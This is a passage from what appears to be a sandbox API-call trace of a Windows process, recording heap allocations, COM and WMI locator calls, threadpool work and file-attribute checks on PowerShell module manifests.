GetProcessHeap () returned 0x510000 [0347.681] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x1a7dca50 [0347.681] GetProcessHeap () returned 0x510000 [0347.681] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x1b6acd90 [0347.681] GetProcessHeap () returned 0x510000 [0347.681] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x1a8a8610 [0347.681] SetEvent (hEvent=0x80c) returned 1 [0347.681] GetProcessHeap () returned 0x510000 [0347.681] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8aa980) returned 1 [0347.681] TpReleaseWork () returned 0x1 [0347.681] TpReleaseWork () returned 0x1 [0347.681] GetProcessHeap () returned 0x510000 [0347.682] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a89e880) returned 1 [0347.682] GetProcessHeap () returned 0x510000 [0347.682] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1b66de10) returned 1 [0347.682] GetProcessHeap () returned 0x510000 [0347.682] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8aa8c0) returned 1 [0347.682] GetProcessHeap () returned 0x510000 [0347.682] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a898ed0) returned 1 [0347.682] GetProcessHeap () returned 0x510000 [0347.682] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8c90) returned 1 [0347.682] PublishDebugMessage () returned 0x1 [0347.682] PublishDebugMessage () returned 0x1 [0347.683] GetProcessHeap () returned 0x510000 [0347.683] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a7c4f30) returned 1 [0347.683] PublishDebugMessage () returned 0x1 [0347.925] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7fffbdc42060, phModule=0x1a56fbe8 | out: phModule=0x1a56fbe8*=0x7fffbdc30000) returned 1 [0347.925] TpCallbackUnloadDllOnCompletion () returned 0x7fffbdc2ffff [0347.925] PublishDebugMessage () returned 0x1 [0347.925] TpWaitForWork () returned 0x0 [0347.925] GetProcessHeap () returned 0x510000 [0347.925] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x1a7dc690 [0347.925] SetEvent (hEvent=0x80c) returned 1 [0347.925] TpReleaseWork () returned 0x1 [0347.925] TpReleaseWork () returned 0x2 [0347.925] GetProcessHeap () returned 0x510000 [0347.925] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a8d90) returned 1 [0347.925] GetProcessHeap () returned 0x510000 [0347.925] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1b66d990) returned 1 [0347.926] GetProcessHeap () returned 0x510000 [0347.926] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a8a91b0) returned 1 [0347.926] PublishDebugMessage () returned 0x1 [0347.926] PublishDebugMessage () returned 0x1 [0347.926] GetProcessHeap () returned 0x510000 [0347.926] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a7c5110) returned 1 [0347.926] PublishDebugMessage () returned 0x1 Thread: id = 286 os_tid = 0x8b8 [0344.508] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0344.508] CoCreateInstance (in: rclsid=0x7fffbdc49a38*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffbdc4a450*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1a848450 | out: ppv=0x1a848450*=0x7fffcbe91a68) returned 0x0 [0344.509] CoCreateInstance (in: rclsid=0x7fffbdc4a470*(Data1=0x34e, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffbdc4a440*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1a848448 | out: ppv=0x1a848448*=0x1a8a8650) returned 0x0 [0344.509] SetEvent (hEvent=0x808) returned 1 [0344.539] WaitForSingleObject (hHandle=0x80c, dwMilliseconds=0xffffffff) returned 0x0 [0347.683] WbemLocator:IUnknown:Release (This=0x1b66e0c0) returned 0x1 [0347.683] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7fffcbe91a68, dwCookie=0x201) returned 0x0 [0347.683] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a7c86d0) returned 0x9 [0347.683] ResultFromHRESULT () returned 0x0 [0347.683] WbemContext:IUnknown:Release (This=0x1a832a80) returned 0x0 [0347.683] GetProcessHeap () returned 0x510000 [0347.684] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a7dca50) returned 1 [0347.684] WaitForSingleObject (hHandle=0x80c, dwMilliseconds=0xffffffff) returned 0x0 [0347.927] WbemLocator:IUnknown:Release (This=0x1b66da90) returned 0x1 [0347.927] GetProcessHeap () returned 0x510000 [0347.927] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a7dc690) returned 1 [0347.927] WaitForSingleObject (hHandle=0x80c, dwMilliseconds=0xffffffff) returned 0x0 [0352.380] WbemLocator:IUnknown:Release (This=0x1b66e0c0) Thread: id = 287 os_tid = 0xe58 [0342.141] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x1a66f648 | out: UnbiasedTime=0x1a66f648) returned 1 [0345.041] malloc (_Size=0x8) returned 0x6fb7a0 [0345.041] LocalAlloc (uFlags=0x0, uBytes=0x60) returned 0x1a8644b0 [0345.042] LocalFree (hMem=0x1a8644b0) returned 0x0 [0345.042] free (_Block=0x6fb7a0) [0345.042] malloc (_Size=0x8) returned 0x6fb8b0 [0345.042] LocalAlloc (uFlags=0x0, uBytes=0x60) returned 0x1a8649f0 [0345.043] LocalFree (hMem=0x1a8649f0) returned 0x0 [0345.043] free (_Block=0x6fb8b0) [0345.044] malloc (_Size=0x8) returned 0x6fb8c0 [0345.044] LocalAlloc (uFlags=0x0, uBytes=0x60) returned 0x1a864670 [0345.066] LocalFree (hMem=0x1a864670) returned 0x0 [0345.066] free (_Block=0x6fb8c0) [0345.151] CoCreateGuid (in: pguid=0x1a66ce78 | out: pguid=0x1a66ce78*(Data1=0x1b5daa8, Data2=0xd937, Data3=0x4e3e, Data4=([0]=0xb1, [1]=0x65, [2]=0x32, [3]=0xe5, [4]=0xba, [5]=0x18, [6]=0x4c, [7]=0xf0))) returned 0x0 [0345.259] CoTaskMemAlloc (cb=0x1c) returned 0x1a8aa6b0 [0345.260] CoTaskMemFree (pv=0x1a8aa6b0) [0345.276] malloc (_Size=0x18) returned 0x6f6220 [0345.306] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x1a898d10 [0345.306] LocalFree (hMem=0x1a898d10) returned 0x0 [0345.306] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x1a898fd0 [0345.331] LocalFree (hMem=0x1a898fd0) returned 0x0 [0345.332] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x1a898fd0 [0345.332] LocalFree (hMem=0x1a898fd0) returned 0x0 [0345.332] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x1a898d10 [0345.332] LocalFree (hMem=0x1a898d10) returned 0x0 [0345.332] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1a8aa8c0 [0345.333] LocalFree (hMem=0x1a8aa8c0) returned 0x0 [0345.333] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1a8aa2c0 [0345.334] LocalFree (hMem=0x1a8aa2c0) returned 0x0 [0345.370] malloc (_Size=0x120) returned 0x6f88b0 [0345.370] MI_OperationWrapper_Initialize () returned 0x0 [0345.371] GetAddr_OperationCallbacks_NativeInstanceCallback () returned 0x7fffbc8d1ad0 [0345.378] GetAddr_OperationCallbacks_NativeStreamedParameterResultCallback () returned 0x7fffbc8d1b80 [0345.379] GetAddr_OperationCallbacks_NativeWriteMessageCallback () returned 0x7fffbc8d1be0 [0345.379] GetAddr_OperationCallbacks_NativeWriteProgressCallback () returned 0x7fffbc8d1c20 [0345.380] GetAddr_OperationCallbacks_NativeWriteErrorCallback () returned 0x7fffbc8d1c80 [0345.380] GetAddr_OperationCallbacks_NativePromptUserCallback () returned 0x7fffbc8d1ce0 [0345.381] MI_OperationWrapper_SetupDrainingIfNeeded () returned 0x0 [0345.382] GetProcessHeap () returned 0x510000 [0345.382] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x1a8aa980 [0345.382] OperationOptions_Create () returned 0x0 [0345.382] wcscmp (_String1="__MI_OPERATIONOPTIONS_WRITEERRORMODE", _String2="__MI_OPERATIONOPTIONS_PROVIDER_ARCHITECTURE") returned 1 [0345.382] wcscmp (_String1="__MI_OPERATIONOPTIONS_WRITEERRORMODE", _String2="__MI_OPERATIONOPTIONS_REQUIRED_ARCHITECTURE") returned 1 [0345.382] wcscmp (_String1="__MI_OPERATIONOPTIONS_PROMPTUSERMODEREGULAR_ACKVALUE", _String2="__MI_OPERATIONOPTIONS_PROVIDER_ARCHITECTURE") returned -1 [0345.382] wcscmp (_String1="__MI_OPERATIONOPTIONS_PROMPTUSERMODEREGULAR_ACKVALUE", _String2="__MI_OPERATIONOPTIONS_REQUIRED_ARCHITECTURE") returned -1 [0345.382] wcscmp (_String1="__MI_OPERATIONOPTIONS_PROMPTUSERMODE", _String2="__MI_OPERATIONOPTIONS_PROVIDER_ARCHITECTURE") returned -1 [0345.383] wcscmp (_String1="__MI_OPERATIONOPTIONS_PROMPTUSERMODE", _String2="__MI_OPERATIONOPTIONS_REQUIRED_ARCHITECTURE") returned -1 [0345.383] wcscmp (_String1="__MI_OPERATIONOPTIONS_IMPROVEDPERF_STREAMING", _String2="__MI_OPERATIONOPTIONS_PROVIDER_ARCHITECTURE") returned -1 [0345.383] wcscmp (_String1="__MI_OPERATIONOPTIONS_IMPROVEDPERF_STREAMING", _String2="__MI_OPERATIONOPTIONS_REQUIRED_ARCHITECTURE") returned -1 [0345.383] PublishDebugMessage () returned 0x1 [0345.383] GetProcessHeap () returned 0x510000 [0345.383] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x24) returned 0x1a8aa8c0 [0345.383] memcpy (in: _Dst=0x1a8aa8c0, _Src=0x2633acc, _Size=0x24 | out: _Dst=0x1a8aa8c0) returned 0x1a8aa8c0 [0345.383] GetProcessHeap () returned 0x510000 [0345.383] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x1a898ed0 [0345.383] memcpy (in: _Dst=0x1a898ed0, _Src=0x2458f64, _Size=0x8 | out: _Dst=0x1a898ed0) returned 0x1a898ed0 [0345.384] PublishDebugMessage () returned 0x1 [0345.384] GetProcessHeap () returned 0x510000 [0345.384] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1d8) returned 0x1a7c4f30 [0345.384] ??0DynamicSchema@@QEAA@XZ () returned 0x1a7c50f8 [0345.384] GetCorrelationId () returned 0x0 [0345.384] CreateThreadpoolWork (in: pfnwk=0x7fffbdc39d10, pv=0x1a7c4f30, pcbe=0x0 | out: pv=0x1a7c4f30) returned 0x1a847f60 [0345.384] GetProcessHeap () returned 0x510000 [0345.384] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x1a89e880 [0345.384] memcpy (in: _Dst=0x1a89e880, _Src=0x26339dc, _Size=0x40 | out: _Dst=0x1a89e880) returned 0x1a89e880 [0345.384] GetTickCount64 () returned 0x124aa5d [0345.385] GetProcessHeap () returned 0x510000 [0345.385] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a8c90 [0345.385] PublishDebugMessage () returned 0x1 [0345.385] TpPostWork () returned 0x3 [0345.385] PublishDebugMessage () returned 0x1 Thread: id = 288 os_tid = 0x5b0 Thread: id = 289 os_tid = 0xf40 Thread: id = 290 os_tid = 0xa58 Thread: id = 291 os_tid = 0xfb0 [0342.142] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility\\psworkflowutility.psd1")) returned 0x20 [0342.142] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache\\StorageBusCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storagebuscache\\storagebuscache.psd1")) returned 0x20 [0342.142] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1")) returned 0x20 [0342.143] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsupdate\\windowsupdate.psd1")) returned 0x20 [0342.143] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1")) returned 0x20 [0342.143] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization\\DeliveryOptimization.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\deliveryoptimization\\deliveryoptimization.psd1")) returned 0x20 [0342.143] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0342.143] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1")) returned 0x20 [0342.143] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1")) returned 0x20 [0342.144] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\2.0.0\\psreadline.psm1")) returned 0x20 [0342.144] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\2.0.0\\psreadline.psd1")) returned 0x20 [0342.144] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsdeveloperlicense\\windowsdeveloperlicense.psd1")) returned 0x20 [0342.144] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1")) returned 0x20 [0342.144] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0342.145] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci\\configci.psd1")) returned 0x20 [0342.145] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning\\Provisioning.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\provisioning\\provisioning.psd1")) returned 0x20 [0342.145] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice\\pnpdevice.psd1")) returned 0x20 [0342.145] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1")) returned 0x20 [0342.146] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psm1")) returned 0x20 [0342.146] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1")) returned 0x20 [0342.146] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks\\scheduledtasks.psd1")) returned 0x20 [0342.146] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement\\printmanagement.psd1")) returned 0x20 [0342.146] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0342.146] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1")) returned 0x20 [0342.147] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psm1")) returned 0x20 [0342.147] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1")) returned 0x20 [0342.147] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1")) returned 0x20 [0342.147] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1")) returned 0x20 [0342.147] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1")) returned 0x20 [0342.147] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki\\pki.psd1")) returned 0x20 [0342.148] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\trustedplatformmodule\\trustedplatformmodule.psd1")) returned 0x20 [0342.148] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1")) returned 0x20 [0342.148] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1")) returned 0x20 [0342.148] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1")) returned 0x20 [0342.149] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations\\ProcessMitigations.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\processmitigations\\processmitigations.psd1")) returned 0x20 [0342.149] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV\\UEV.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\uev\\uev.psd1")) returned 0x20 [0342.149] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1")) returned 0x20 [0342.149] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow\\psworkflow.psd1")) returned 0x20 [0342.149] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare\\smbshare.psd1")) returned 0x20 [0342.149] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1")) returned 0x20 [0342.150] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1")) returned 0x20 [0342.150] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1")) returned 0x20 [0342.150] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1")) returned 0x20 [0342.150] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts\\1.0.0.0\\Microsoft.PowerShell.LocalAccounts.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.localaccounts\\1.0.0.0\\microsoft.powershell.localaccounts.psd1")) returned 0x20 [0342.150] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1")) returned 0x20 [0342.151] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1")) returned 0x20 [0342.151] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1")) returned 0x20 [0342.151] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory\\PersistentMemory.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\persistentmemory\\persistentmemory.psd1")) returned 0x20 [0342.151] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1")) returned 0x20 [0342.152] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient\\appvclient.psd1")) returned 0x20 [0342.152] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot\\secureboot.psd1")) returned 0x20 [0342.152] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0342.152] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager\\networkswitchmanager.psd1")) returned 0x20 [0342.152] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1")) returned 0x20 [0342.152] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1")) returned 0x20 [0342.153] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1")) returned 0x20 [0342.153] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage\\storage.psd1")) returned 0x20 [0342.153] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0342.153] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\tls\\tls.psd1")) returned 0x20 [0342.153] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat\\netnat.psd1")) returned 0x20 [0342.153] GetFileAttributesW 